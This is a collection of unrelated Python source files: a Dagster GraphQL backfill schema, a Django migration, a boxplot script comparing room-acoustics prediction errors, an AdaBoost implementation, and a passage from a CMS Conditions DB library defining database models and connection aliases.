GrapheneInvalidOutputError,
GrapheneRunConfigValidationInvalid,
GraphenePipelineNotFoundError,
GrapheneRunConflict,
GrapheneUnauthorizedError,
GraphenePythonError,
) + create_execution_params_error_types
class GrapheneLaunchBackfillSuccess(graphene.ObjectType):
backfill_id = graphene.NonNull(graphene.String)
launched_run_ids = graphene.List(graphene.String)
class Meta:
name = "LaunchBackfillSuccess"
class GrapheneLaunchBackfillResult(graphene.Union):
class Meta:
types = (
GrapheneLaunchBackfillSuccess,
GraphenePartitionSetNotFoundError,
) + pipeline_execution_error_types
name = "LaunchBackfillResult"
class GrapheneCancelBackfillSuccess(graphene.ObjectType):
backfill_id = graphene.NonNull(graphene.String)
class Meta:
name = "CancelBackfillSuccess"
class GrapheneCancelBackfillResult(graphene.Union):
class Meta:
types = (GrapheneCancelBackfillSuccess, GrapheneUnauthorizedError, GraphenePythonError)
name = "CancelBackfillResult"
class GrapheneResumeBackfillSuccess(graphene.ObjectType):
backfill_id = graphene.NonNull(graphene.String)
class Meta:
name = "ResumeBackfillSuccess"
class GrapheneResumeBackfillResult(graphene.Union):
class Meta:
types = (GrapheneResumeBackfillSuccess, GrapheneUnauthorizedError, GraphenePythonError)
name = "ResumeBackfillResult"
class GrapheneBulkActionStatus(graphene.Enum):
REQUESTED = "REQUESTED"
COMPLETED = "COMPLETED"
FAILED = "FAILED"
CANCELED = "CANCELED"
class Meta:
name = "BulkActionStatus"
class GraphenePartitionBackfill(graphene.ObjectType):
class Meta:
name = "PartitionBackfill"
backfillId = graphene.NonNull(graphene.String)
status = graphene.NonNull(GrapheneBulkActionStatus)
numRequested = graphene.NonNull(graphene.Int)
numTotal = graphene.NonNull(graphene.Int)
fromFailure = graphene.NonNull(graphene.Boolean)
reexecutionSteps = non_null_list(graphene.String)
partitionSetName = graphene.NonNull(graphene.String)
timestamp = graphene.NonNull(graphene.Float)
partitionSet = graphene.Field("dagster_graphql.schema.partition_sets.GraphenePartitionSet")
runs = graphene.Field(
non_null_list("dagster_graphql.schema.pipelines.pipeline.GrapheneRun"),
limit=graphene.Int(),
)
error = graphene.Field(GraphenePythonError)
def __init__(self, backfill_job):
self._backfill_job = check.opt_inst_param(backfill_job, "backfill_job", PartitionBackfill)
super().__init__(
backfillId=backfill_job.backfill_id,
partitionSetName=backfill_job.partition_set_origin.partition_set_name,
status=backfill_job.status,
numTotal=len(backfill_job.partition_names),
fromFailure=bool(backfill_job.from_failure),
reexecutionSteps=backfill_job.reexecution_steps,
timestamp=backfill_job.backfill_timestamp,
)
def resolve_runs(self, graphene_info, **kwargs):
from .pipelines.pipeline import GrapheneRun
filters = PipelineRunsFilter.for_backfill(self._backfill_job.backfill_id)
return [
GrapheneRun(r)
for r in graphene_info.context.instance.get_runs(
filters=filters,
limit=kwargs.get("limit"),
)
]
def resolve_numRequested(self, graphene_info):
filters = PipelineRunsFilter.for_backfill(self._backfill_job.backfill_id)
run_count = graphene_info.context.instance.get_runs_count(filters)
if self._backfill_job.status == BulkActionStatus.COMPLETED:
return len(self._backfill_job.partition_names)
checkpoint = self._backfill_job.last_submitted_partition_name
return max(
run_count,
self._backfill_job.partition_names.index(checkpoint) + 1
if checkpoint and checkpoint in self._backfill_job.partition_names
else 0,
)
def resolve_partitionSet(self, graphene_info):
from ..schema.partition_sets import GraphenePartitionSet
origin = self._backfill_job.partition_set_origin
location_name = origin.external_repository_origin.repository_location_origin.location_name
repository_name = origin.external_repository_origin.repository_name
if not graphene_info.context.has_repository_location(location_name):
return None
location = graphene_info.context.get_repository_location(location_name)
if not location.has_repository(repository_name):
return None
repository = location.get_repository(repository_name)
external_partition_sets = [
partition_set
for partition_set in repository.get_external_partition_sets()
if partition_set.name == origin.partition_set_name
]
if not external_partition_sets:
return None
partition_set = external_partition_sets[0]
return GraphenePartitionSet(
external_repository_handle=repository.handle,
external_partition_set=partition_set,
)
def resolve_error(self, _):
if self._backfill_job.error:
return GraphenePythonError(self._backfill_job.error)
return None
class GraphenePartitionBackfillOrError(graphene.Union):
class Meta:
types = (GraphenePartitionBackfill, GraphenePythonError)
name = "PartitionBackfillOrError"
class GraphenePartitionBackfills(graphene.ObjectType):
results = non_null_list(GraphenePartitionBackfill)
class Meta:
name = "PartitionBackfills"
class GraphenePartitionBackfillsOrError(graphene.Union):
class Meta:
types = (GraphenePartitionBackfills, GraphenePythonError)
name = "PartitionBackfillsOrError"
|
the-stack_106_14807
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('server', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='fuelclass',
options={'verbose_name_plural': 'fuel classes'},
),
]
|
the-stack_106_14808
|
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
abc=np.load("vp_1_test.npy")
abcd=np.load("vp_2_test.npy")
abcde=np.load("vp_3_test.npy")
abcdef=np.load("vp_2_weightmean_test.npy")
std_vol=106.02265
std_surf=84.2240762
std_rt60=[ 0.7793691,0.7605436,0.6995225, 0.7076664, 0.6420753,0.51794204]
std_abs=[0.100825,0.1172430,0.1002776,0.09108845,0.09378748,0.091663032]
err_1=np.abs(abc[:,0]*std_surf-abc[:,14])
err_2=np.abs(abc[:,1]*std_vol-abc[:,15])
err_3=np.abs(abc[:,2]*std_rt60[0]-abc[:,16])
err_4=np.abs(abc[:,3]*std_rt60[1]-abc[:,17])
err_5=np.abs(abc[:,4]*std_rt60[2]-abc[:,18])
err_6=np.abs(abc[:,5]*std_rt60[3]-abc[:,19])
err_7=np.abs(abc[:,6]*std_rt60[4]-abc[:,20])
err_8=np.abs(abc[:,7]*std_rt60[5]-abc[:,21])
err_9=np.abs(abc[:,8]*std_abs[0]-abc[:,22])
err_10=np.abs(abc[:,9]*std_abs[1]-abc[:,23])
err_11=np.abs(abc[:,10]*std_abs[2]-abc[:,24])
err_12=np.abs(abc[:,11]*std_abs[3]-abc[:,25])
err_13=np.abs(abc[:,12]*std_abs[4]-abc[:,26])
err_14=np.abs(abc[:,13]*std_abs[5]-abc[:,27])
err2_1=np.abs(abcd[:,0]*std_surf-abcd[:,14])
err2_2=np.abs(abcd[:,1]*std_vol-abcd[:,15])
err2_3=np.abs(abcd[:,2]*std_rt60[0]-abcd[:,16])
err2_4=np.abs(abcd[:,3]*std_rt60[1]-abcd[:,17])
err2_5=np.abs(abcd[:,4]*std_rt60[2]-abcd[:,18])
err2_6=np.abs(abcd[:,5]*std_rt60[3]-abcd[:,19])
err2_7=np.abs(abcd[:,6]*std_rt60[4]-abcd[:,20])
err2_8=np.abs(abcd[:,7]*std_rt60[5]-abcd[:,21])
err2_9=np.abs(abcd[:,8]*std_abs[0]-abcd[:,22])
err2_10=np.abs(abcd[:,9]*std_abs[1]-abcd[:,23])
err2_11=np.abs(abcd[:,10]*std_abs[2]-abcd[:,24])
err2_12=np.abs(abcd[:,11]*std_abs[3]-abcd[:,25])
err2_13=np.abs(abcd[:,12]*std_abs[4]-abcd[:,26])
err2_14=np.abs(abcd[:,13]*std_abs[5]-abcd[:,27])
err3_1=np.abs(abcde[:,0]*std_surf-abcde[:,14])
err3_2=np.abs(abcde[:,1]*std_vol-abcde[:,15])
err3_3=np.abs(abcde[:,2]*std_rt60[0]-abcde[:,16])
err3_4=np.abs(abcde[:,3]*std_rt60[1]-abcde[:,17])
err3_5=np.abs(abcde[:,4]*std_rt60[2]-abcde[:,18])
err3_6=np.abs(abcde[:,5]*std_rt60[3]-abcde[:,19])
err3_7=np.abs(abcde[:,6]*std_rt60[4]-abcde[:,20])
err3_8=np.abs(abcde[:,7]*std_rt60[5]-abcde[:,21])
err3_9=np.abs(abcde[:,8]*std_abs[0]-abcde[:,22])
err3_10=np.abs(abcde[:,9]*std_abs[1]-abcde[:,23])
err3_11=np.abs(abcde[:,10]*std_abs[2]-abcde[:,24])
err3_12=np.abs(abcde[:,11]*std_abs[3]-abcde[:,25])
err3_13=np.abs(abcde[:,12]*std_abs[4]-abcde[:,26])
err3_14=np.abs(abcde[:,13]*std_abs[5]-abcde[:,27])
err4_1=np.abs(abcdef[:,0]*std_surf-abcdef[:,14])
err4_2=np.abs(abcdef[:,1]*std_vol-abcdef[:,15])
err4_3=np.abs(abcdef[:,2]*std_rt60[0]-abcdef[:,16])
err4_4=np.abs(abcdef[:,3]*std_rt60[1]-abcdef[:,17])
err4_5=np.abs(abcdef[:,4]*std_rt60[2]-abcdef[:,18])
err4_6=np.abs(abcdef[:,5]*std_rt60[3]-abcdef[:,19])
err4_7=np.abs(abcdef[:,6]*std_rt60[4]-abcdef[:,20])
err4_8=np.abs(abcdef[:,7]*std_rt60[5]-abcdef[:,21])
err4_9=np.abs(abcdef[:,8]*std_abs[0]-abcdef[:,22])
err4_10=np.abs(abcdef[:,9]*std_abs[1]-abcdef[:,23])
err4_11=np.abs(abcdef[:,10]*std_abs[2]-abcdef[:,24])
err4_12=np.abs(abcdef[:,11]*std_abs[3]-abcdef[:,25])
err4_13=np.abs(abcdef[:,12]*std_abs[4]-abcdef[:,26])
err4_14=np.abs(abcdef[:,13]*std_abs[5]-abcdef[:,27])
std_vol=106.02265
std_surf=84.2240762
std_rt60=[ 0.7793691,0.7605436,0.6995225, 0.7076664, 0.6420753,0.51794204]
std_abs=[0.100825,0.1172430,0.1002776,0.09108845,0.09378748,0.091663032]
fig,axs=plt.subplots(7,2,figsize=(10,25))
#ep=10e-5
bplot1=axs[0,0].boxplot([err_9,err2_9,err3_9,err4_9],showmeans=True,vert=True,showfliers=True,patch_artist=True)
axs[0,0].set_xticks([1,2,3,4])
axs[0,0].set_xticklabels(['MN 1 VP','MN 2 VP','MN 3 vp','MN WM'],rotation=45)
axs[0,0].set_ylabel("Abs Err Ab")
axs[0,0].set_title("125hz")
#print(bplot1["fliers"][1].get_data()[1])
bplot2=axs[0,1].boxplot([err_10,err2_10,err3_10,err4_10],showmeans=True,vert=True,showfliers=False,patch_artist=True)
axs[0,1].set_xticks([1,2,3,4])
axs[0,1].set_xticklabels(['MN 1 VP','MN 2 VP','MN 3 vp','MN WM'],rotation=45)
axs[0,1].set_ylabel("Abs Err Ab")
axs[0,1].set_title("AB Coeff 250hz")
bplot3=axs[1,0].boxplot([err_11,err2_11,err3_11,err4_11],showmeans=True,vert=True,showfliers=False,patch_artist=True)
axs[1,0].set_xticks([1,2,3,4])
axs[1,0].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[1,0].set_ylabel("Abs Err Ab")
axs[1,0].set_title("AB Coeff 500hz")
bplot4=axs[1,1].boxplot([err_12,err2_12,err3_12,err4_12],showmeans=True,vert=True,showfliers=False,patch_artist=True)
axs[1,1].set_xticks([1,2,3,4])
axs[1,1].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[1,1].set_ylabel("Abs Err Ab")
axs[1,1].set_title("Ab Coeff 1000hz")
bplot5=axs[2,0].boxplot([err_13,err2_13,err3_13,err4_13],showmeans=True,vert=True,showfliers=False,patch_artist=True)
axs[2,0].set_xticks([1,2,3,4])
axs[2,0].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[2,0].set_ylabel("Abs Err Ab")
axs[2,0].set_title("Ab Coeff 2000hz")
bplot6=axs[2,1].boxplot([err_14,err2_14,err3_14,err4_14],showmeans=True,vert=True,showfliers=False,patch_artist=True)
axs[2,1].set_xticks([1,2,3,4])
axs[2,1].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[2,1].set_ylabel("Abs Err Ab")
axs[2,1].set_title("Ab Coeff 4000hz")
out_rt=False
bplot7=axs[3,0].boxplot([err_3,err2_3,err3_3,err4_3],showmeans=True,vert=True,showfliers=out_rt,patch_artist=True)
axs[3,0].set_xticks([1,2,3,4])
axs[3,0].set_xticklabels(['MN 1 src','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[3,0].set_ylabel("Abs Err Ab")
axs[3,0].set_title("RT 60 125hz")
#print(bplot1["fliers"][1].get_data()[1])
bplot8=axs[3,1].boxplot([err_4,err2_4,err3_4,err4_4],showmeans=True,vert=True,showfliers=out_rt,patch_artist=True)
axs[3,1].set_xticks([1,2,3,4])
axs[3,1].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[3,1].set_ylabel("Abs Err Sec")
axs[3,1].set_title("RT 60 250hz")
bplot9=axs[4,0].boxplot([err_5,err2_5,err3_5,err4_5],showmeans=True,vert=True,showfliers=out_rt,patch_artist=True)
axs[4,0].set_xticks([1,2,3,4])
axs[4,0].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[4,0].set_ylabel("Abs Err Sec")
axs[4,0].set_title("RT 60 500hz")
bplot10=axs[4,1].boxplot([err_6,err2_6,err3_6,err4_6],showmeans=True,vert=True,showfliers=out_rt,patch_artist=True)
axs[4,1].set_xticks([1,2,3,4])
axs[4,1].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[4,1].set_ylabel("Abs Err Sec")
axs[4,1].set_title("RT60 1000hz")
bplot11=axs[5,0].boxplot([err_7,err2_7,err3_7,err4_7],showmeans=True,vert=True,showfliers=out_rt,patch_artist=True)
axs[5,0].set_xticks([1,2,3,4])
axs[5,0].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[5,0].set_ylabel("Abs Err Sec")
axs[5,0].set_title("RT 60 2000hz")
bplot12=axs[5,1].boxplot([err_8,err2_8,err3_8,err4_8],showmeans=True,vert=True,showfliers=out_rt,patch_artist=True)
axs[5,1].set_xticks([1,2,3,4])
axs[5,1].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[5,1].set_ylabel("Abs Err Sec")
axs[5,1].set_title("RT 60 4000hz")
bplot13=axs[6,0].boxplot([err_1,err2_1,err3_1,err4_1],showmeans=True,vert=True,showfliers=True,patch_artist=True)
axs[6,0].set_xticks([1,2,3,4])
axs[6,0].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[6,0].set_ylabel("Abs Err M2")
axs[6,0].set_title("Surface")
bplot14=axs[6,1].boxplot([err_2,err2_2,err3_2,err4_2],showmeans=True,vert=True,showfliers=True,patch_artist=True)
axs[6,1].set_xticks([1,2,3,4])
axs[6,1].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[6,1].set_ylabel("Abs Err M3")
axs[6,1].set_title("Volume")
colors=['pink','lightblue','lightgreen','orange','cyan']
for bplot in (bplot1,bplot2,bplot3,bplot4,bplot5,bplot6,bplot7,bplot8,bplot9,bplot10,bplot11,bplot12,bplot13,bplot14):
for patch,color in zip(bplot['boxes'],colors):
patch.set_facecolor(color)
fig.tight_layout(pad=3.0)
#plt.xticks([1,2,3],('Dummy Bnf','bnf','Dummy M','M'))
#plt.title("Absolute Diff Estimated Mean And Target RT60")
plt.savefig("test_mono_comparasion.png")
|
the-stack_106_14809
|
from typing import Tuple
import numpy as np
import pandas as pd
from HW4.decisionstump import DecisionStump
class Adaboost:
def __init__(self):
self.T = 0
self.h = []
self.alpha = pd.Series([])
self.w = pd.DataFrame([])
def train(self, X_train: pd.DataFrame, y_train: pd.Series,
n_iter: int = 10):
# Initialize parameters
N, D = X_train.shape
self.T = n_iter
self.h = []
self.alpha = []
self.w = []
w_t = pd.Series(np.full(N, 1/N), index=y_train.index, name=f"iter 0")
# Boosting
for t in range(self.T):
h_t = DecisionStump()
# Compute the weighted training error of h_t
err_t = h_t.train(X_train, y_train, w_t)
# Compute the importance of h_t
alpha_t = 0.5 * np.log((1 - err_t) / err_t)
# Update the weights
h_t_pred = h_t.predict(X_train)
w_t = w_t * np.exp(-alpha_t * y_train * h_t_pred)
w_t = w_t / w_t.sum()
w_t = pd.Series(w_t, index=y_train.index, name=f"iter {t+1}")
# Store parameters
self.h.append(h_t)
self.alpha.append(alpha_t)
self.w.append(w_t)
self.alpha = pd.Series(self.alpha, name='importance')
self.w = pd.DataFrame(self.w).T
def predict(self, X_test: pd.DataFrame) -> pd.Series:
# h_pred: shape=(T, N), predictions by all the weak classifiers
h_pred = np.array([h_t.predict(X_test).to_numpy() for h_t in self.h])
# alpha: shape=(T,), importance of each weak classifier
alpha = np.array(self.alpha)
y_pred = np.sign(np.einsum('ti,t->i', h_pred, alpha))
y_pred = pd.Series(y_pred, index=X_test.index, name='y_pred')
return y_pred
def eval_model(self, X_test: pd.DataFrame, y_test: pd.Series, full: bool = False):
if not full:
y_pred = self.predict(X_test)
acc = self.acc(y_pred, y_test)
return y_pred, acc
else:
y_preds = []
accs = []
for t in range(self.T):
alpha, h = self.alpha[:t+1], self.h[:t+1]
y_pred = self._predict(X_test, alpha, h)
y_pred.name = f"iter {t+1}"
y_preds.append(y_pred)
accs.append(self.acc(y_pred, y_test))
y_preds = pd.DataFrame(y_preds).T
accs = pd.Series(accs, name='accuracy')
return y_preds, accs
@staticmethod
def acc(y_pred: pd.Series, y_true: pd.Series) -> float:
return np.average(y_pred.to_numpy() == y_true.to_numpy())
@staticmethod
def _predict(X_test: pd.DataFrame, alpha: pd.Series, h: list):
# h_pred: shape=(T, N), predictions by all the weak classifiers
h_pred = np.array([h_t.predict(X_test).to_numpy() for h_t in h])
# alpha: shape=(T,), importance of each weak classifier
alpha = np.array(alpha)
y_pred = np.sign(np.einsum('ti,t->i', h_pred, alpha))
y_pred = pd.Series(y_pred, index=X_test.index, name='y_pred')
return y_pred
|
the-stack_106_14810
|
'''CMS Conditions DB Python library.
'''
__author__ = 'Miguel Ojeda'
__copyright__ = 'Copyright 2013, CERN'
__credits__ = ['Giacomo Govi', 'Miguel Ojeda', 'Andreas Pfeiffer']
__license__ = 'Unknown'
__maintainer__ = 'Giacomo Govi'
__email__ = '[email protected]'
import os
import hashlib
import logging
import sqlalchemy
import sqlalchemy.ext.declarative
import enum
from sqlalchemy import Enum
schema_name = 'CMS_CONDITIONS'
dbuser_name = 'cms_conditions'
dbreader_user_name = 'cms_cond_general_r'
dbwriter_user_name = 'cms_cond_general_w'
logger = logging.getLogger(__name__)
#authentication/authorization params
authPathEnvVar = 'COND_AUTH_PATH'
dbkey_filename = 'db.key'
dbkey_folder = os.path.join('.cms_cond',dbkey_filename)
# frontier services
PRO ='PromptProd'
ARC ='FrontierArc'
INT ='FrontierInt'
DEV ='FrontierPrep'
# oracle read only services
ORAPRO = 'cms_orcon_adg'
ORAARC = 'cmsarc_lb'
# oracle masters
ORAINT = 'cms_orcoff_int'
ORADEV = 'cms_orcoff_prep'
ONLINEORAPRO = 'cms_orcon_prod'
ONLINEORAINT = 'cmsintr_lb'
# Set initial level to WARN. This so that log statements don't occur in
# the absense of explicit logging being enabled.
if logger.level == logging.NOTSET:
logger.setLevel(logging.WARN)
# Utility functions
def hash(data):
return hashlib.sha1(data.encode('ascii')).hexdigest()
# Constants
empty_label = '-'
name_length = 100
description_length = 4000
hash_length = len(hash(''))
web_experts_email = '[email protected]'
offline_db_experts_email = '[email protected]'
offline_db_experts_phone = '+41 22 76 70817, or 70817 from CERN; check https://twiki.cern.ch/twiki/bin/viewauth/CMS/DBShifterHelpPage if it does not work; availability depends on the state of the LHC'
contact_help = 'If you need assistance, please write an email to %s and %s. If you need immediate/urgent assistance, you can call the Offline DB expert on call (%s).' % (offline_db_experts_email, web_experts_email, offline_db_experts_phone)
database_help = '''
The database parameter (--db) refers to the database where the tool
will connect to read all the data. By default, the production account
(through Frontier) will be used.
In subcommands which take a source and a destination, --db always refers to
the source, and --destdb to the destination. For both of them the following
rules apply.
The database parameter can be an official alias, a filename or any
valid SQLAlchemy URL.
The official aliases are the following strings (first column):
Alias Level Database RO/RW Notes
------------ ----------- ------------- ---------- -------------------------------
pro Production Frontier (ADG) read-only Default.
arc Archive Frontier read-only
int Integration Frontier read-only
dev Development Frontier read-only
boost Production Frontier read-only
boostprep Development Frontier read-only
orapro Production Oracle (ADG) read-only Password required.
oraarc Archive Oracle read-only Password required.
oraint Integration Oracle read-write Password required.
oradev Development Oracle read-write Password required.
onlineorapro Production Oracle read-write Password required. Online only.
onlineoraint Online Int Oracle read-write Password required. Online only.
Most of the time, if you are a regular user, you will want to read/copy
conditions from the Frontier production account. Therefore, you can omit
the --db parameter, unless you want to read from somewhere else,
e.g. from your local SQLite file.
In addition, the parameter may be a filename (path) pointing to a local
SQLite file, e.g.
file.db
relative/path/to/file.db
/absolute/path/to/file.db
Finally, any valid SQLAlchemy URL can be used. This allows full
flexibility in cases where it may be needed, e.g.
sqlite:// In-memory, volatile SQLite DB.
oracle://user@devdb11 Your private Oracle DB in devdb11 [*]
[*] See https://account.cern.ch/ -> Services for more information
on personal Oracle accounts.
For the official aliases, the password will be asked automatically
interactively. The same applies for Oracle URLs where the password
was not provided inside it, e.g.:
oracle://user@devdb11 The tool will prompt you for the password.
oracle://user:pass@devdb11 Password inlined. [+]
[+] Caution: Never write passwords in command-line parameters in
multi-user machines (e.g. lxplus), since other users can see them
in the process table (e.g. ps).
This means that both the official aliases and the filenames are shortcuts
to the full SQLAlchemy URL equivalents, e.g. the following are the same:
relative/path/to/file.db === sqlite:///relative/path/to/file.db
/absolute/path/to/file.db === sqlite:////absolute/path/to/file.db
'''
def oracle_connection_string(db_service, db_schema ):
return 'oracle://%s/%s'%(db_service,db_schema)
class Synchronization(enum.Enum):
any = 'any'
validation = 'validation'
mc = 'mc'
runmc = 'runmc'
hlt = 'hlt'
express = 'express'
prompt = 'prompt'
pcl = 'pcl'
offline = 'offline'
synch_list = list(x.value for x in list(Synchronization))
class TimeType(enum.Enum):
Run = 'Run'
Time = 'Time'
Lumi = 'Lumi'
Hash = 'Hash'
User = 'User'
# Schema definition
_Base = sqlalchemy.ext.declarative.declarative_base()
def fq_name( schema_name, table_name ):
name = table_name
if schema_name is not None:
name = '%s.%s' %(schema_name, table_name)
return name
db_models = {}
class _Col(Enum):
nullable = 0
notNull = 1
pk = 2
class DbRef:
def __init__(self,refType, refColumn):
self.rtype = refType
self.rcol = refColumn
def fq_col( schema, table, column ):
fqn = '%s.%s' %(table, column)
if schema is not None:
fqn = '%s.%s' %(schema,fqn)
return fqn
def make_dbtype( backendName, schemaName, baseType ):
members = {}
deps_reg = set()
dbtype_name = '%s_%s' %(baseType.__name__,backendName)
members['__tablename__'] = baseType.__tablename__
members['__table_args__'] = None
if schemaName is not None:
members['__table_args__'] = {'schema': schemaName }
for k,v in baseType.columns.items():
if isinstance(v[0],DbRef):
refColDbt = v[0].rtype.columns[v[0].rcol][0]
pk = (True if v[1]==_Col.pk else False)
if v[1]==_Col.pk:
members[k] = sqlalchemy.Column(refColDbt,sqlalchemy.ForeignKey(fq_col(schemaName,v[0].rtype.__tablename__,v[0].rcol)),primary_key=True)
else:
nullable = (False if v[1] == _Col.notNull else True)
members[k] = sqlalchemy.Column(refColDbt,sqlalchemy.ForeignKey(fq_col(schemaName,v[0].rtype.__tablename__,v[0].rcol)),nullable=nullable)
if v[0].rtype.__name__ not in deps_reg:
deps_reg.add(v[0].rtype.__name__)
reftype_name = '%s_%s' %(v[0].rtype.__name__,backendName)
members[(v[0].rtype.__name__).lower()] = sqlalchemy.orm.relationship(reftype_name)
else:
if v[1]==_Col.pk:
members[k] = sqlalchemy.Column(v[0],primary_key=True)
else:
nullable = (True if v[1]==_Col.nullable else False)
members[k] = sqlalchemy.Column(v[0],nullable=nullable)
dbType = type(dbtype_name,(_Base,),members)
if backendName not in db_models.keys():
db_models[backendName] = {}
db_models[backendName][baseType.__name__] = dbType
return dbType
def getSchema(tp):
if tp.__table_args__ is not None:
return tp.__table_args__['schema']
return None
class Tag:
__tablename__ = 'TAG'
columns = { 'name': (sqlalchemy.String(name_length),_Col.pk),
'time_type': (sqlalchemy.Enum(*tuple(TimeType.__members__.keys())),_Col.notNull),
'object_type': (sqlalchemy.String(name_length),_Col.notNull),
'synchronization': (sqlalchemy.Enum(*tuple(Synchronization.__members__.keys())),_Col.notNull),
'description': (sqlalchemy.String(description_length),_Col.notNull),
'last_validated_time':(sqlalchemy.BIGINT,_Col.notNull),
'end_of_validity':(sqlalchemy.BIGINT,_Col.notNull),
'insertion_time':(sqlalchemy.TIMESTAMP,_Col.notNull),
'modification_time':(sqlalchemy.TIMESTAMP,_Col.notNull) }
class TagMetadata:
__tablename__ = 'TAG_METADATA'
columns = { 'tag_name': (DbRef(Tag,'name'),_Col.pk),
'min_serialization_v': (sqlalchemy.String(20),_Col.notNull),
'min_since': (sqlalchemy.BIGINT,_Col.notNull),
'modification_time':(sqlalchemy.TIMESTAMP,_Col.notNull) }
class Payload:
__tablename__ = 'PAYLOAD'
columns = { 'hash': (sqlalchemy.CHAR(hash_length),_Col.pk),
'object_type': (sqlalchemy.String(name_length),_Col.notNull),
'data': (sqlalchemy.BLOB,_Col.notNull),
'streamer_info':(sqlalchemy.BLOB,_Col.notNull),
'version':(sqlalchemy.String(20),_Col.notNull),
'insertion_time':(sqlalchemy.TIMESTAMP,_Col.notNull) }
class IOV:
__tablename__ = 'IOV'
columns = { 'tag_name':(DbRef(Tag,'name'),_Col.pk),
'since':(sqlalchemy.BIGINT,_Col.pk),
'insertion_time':(sqlalchemy.TIMESTAMP,_Col.pk),
'payload_hash':(DbRef(Payload,'hash'),_Col.notNull) }
class GlobalTag:
__tablename__ = 'GLOBAL_TAG'
columns = { 'name':(sqlalchemy.String(name_length),_Col.pk),
'validity': (sqlalchemy.BIGINT,_Col.notNull),
'description':(sqlalchemy.String(description_length),_Col.notNull),
'release':(sqlalchemy.String(name_length),_Col.notNull),
'insertion_time':(sqlalchemy.TIMESTAMP,_Col.notNull),
'snapshot_time':(sqlalchemy.TIMESTAMP,_Col.notNull) }
class GlobalTagMap:
__tablename__ = 'GLOBAL_TAG_MAP'
columns = { 'global_tag_name':(DbRef(GlobalTag,'name'),_Col.pk),
'record':(sqlalchemy.String(name_length),_Col.pk),
'label':(sqlalchemy.String(name_length),_Col.pk),
'tag_name':(DbRef(Tag,'name'),_Col.notNull) }
class TagLog:
__tablename__ = 'TAG_LOG'
columns = { 'tag_name':(DbRef(Tag,'name'),_Col.pk),
'event_time':(sqlalchemy.TIMESTAMP,_Col.pk),
'action':(sqlalchemy.String(100),_Col.pk),
'user_name':(sqlalchemy.String(100),_Col.notNull),
'host_name':(sqlalchemy.String(100),_Col.notNull),
'command':(sqlalchemy.String(500),_Col.notNull),
'user_text':(sqlalchemy.String(4000),_Col.notNull) }
class RunInfo:
__tablename__ = 'RUN_INFO'
columns = { 'run_number':(sqlalchemy.BIGINT,_Col.pk),
'start_time':(sqlalchemy.TIMESTAMP,_Col.notNull),
'end_time':(sqlalchemy.TIMESTAMP,_Col.notNull) }
class BoostRunMap:
__tablename__ = 'BOOST_RUN_MAP'
columns = { 'run_number':(sqlalchemy.BIGINT,_Col.pk),
'run_start_time':(sqlalchemy.TIMESTAMP,_Col.notNull),
'boost_version': (sqlalchemy.String(20),_Col.notNull) }
# CondDB object
class Connection(object):
def __init__(self, url):
# Workaround to avoid creating files if not present.
# Python's sqlite3 module does not use sqlite3_open_v2(),
# and therefore we cannot disable SQLITE_OPEN_CREATE.
# Only in the case of creating a new database we skip the check.
if url.drivername == 'sqlite':
self.engine = sqlalchemy.create_engine(url)
enabled_foreign_keys = self.engine.execute('pragma foreign_keys').scalar()
supports_foreign_keys = enabled_foreign_keys is not None
if not supports_foreign_keys:
logger.warning('Your SQLite database does not support foreign keys, so constraints will not be checked. Please upgrade.')
elif not enabled_foreign_keys:
self.engine.execute('pragma foreign_keys = on')
else:
self.engine = sqlalchemy.create_engine(url)
self._session = sqlalchemy.orm.scoped_session(sqlalchemy.orm.sessionmaker(bind=self.engine))
self._is_frontier = url.drivername == 'oracle+frontier'
self._is_oracle = url.drivername == 'oracle'
self._is_sqlite = url.drivername == 'sqlite'
self._is_read_only = self._is_frontier or url.host in {
'cms_orcon_adg',
'cmsarc_lb',
}
self._is_official = self._is_frontier or url.host in {
'cms_orcon_adg',
'cmsarc_lb',
'cms_orcoff_int',
'cms_orcoff_prep',
'cms_orcon_prod',
'cmsintr_lb',
}
self._url = url
self._backendName = ('sqlite' if self._is_sqlite else 'oracle' )
self._schemaName = ( None if self._is_sqlite else schema_name )
logging.debug('Loading db types...')
self.get_dbtype(Tag).__name__
self.get_dbtype(Payload)
self.get_dbtype(IOV)
self.get_dbtype(TagLog)
self.get_dbtype(GlobalTag)
self.get_dbtype(GlobalTagMap)
self.get_dbtype(RunInfo)
if not self._is_sqlite:
self.get_dbtype(TagMetadata)
self.get_dbtype(BoostRunMap)
self._is_valid = self.is_valid()
def get_dbtype(self,theType):
basename = theType.__name__
if self._backendName not in db_models.keys() or basename not in db_models[self._backendName].keys():
return make_dbtype( self._backendName, self._schemaName, theType )
else:
return db_models[self._backendName][basename]
def session(self):
s = self._session()
s.get_dbtype = self.get_dbtype
s._is_sqlite = self._is_sqlite
s.is_oracle = self.is_oracle
s._url = self._url
return s
@property
def metadata(self):
return _Base.metadata
@property
def is_frontier(self):
return self._is_frontier
@property
def is_oracle(self):
return self._is_oracle
@property
def is_sqlite(self):
return self._is_sqlite
@property
def is_read_only(self):
return self._is_read_only
@property
def is_official(self):
return self._is_official
def is_valid(self):
'''Tests whether the current DB looks like a valid CMS Conditions one.
'''
engine_connection = self.engine.connect()
# temporarely avoid the check on the GT tables - there are releases in use where C++ does not create these tables.
_Tag = self.get_dbtype(Tag)
_IOV = self.get_dbtype(IOV)
_Payload = self.get_dbtype(Payload)
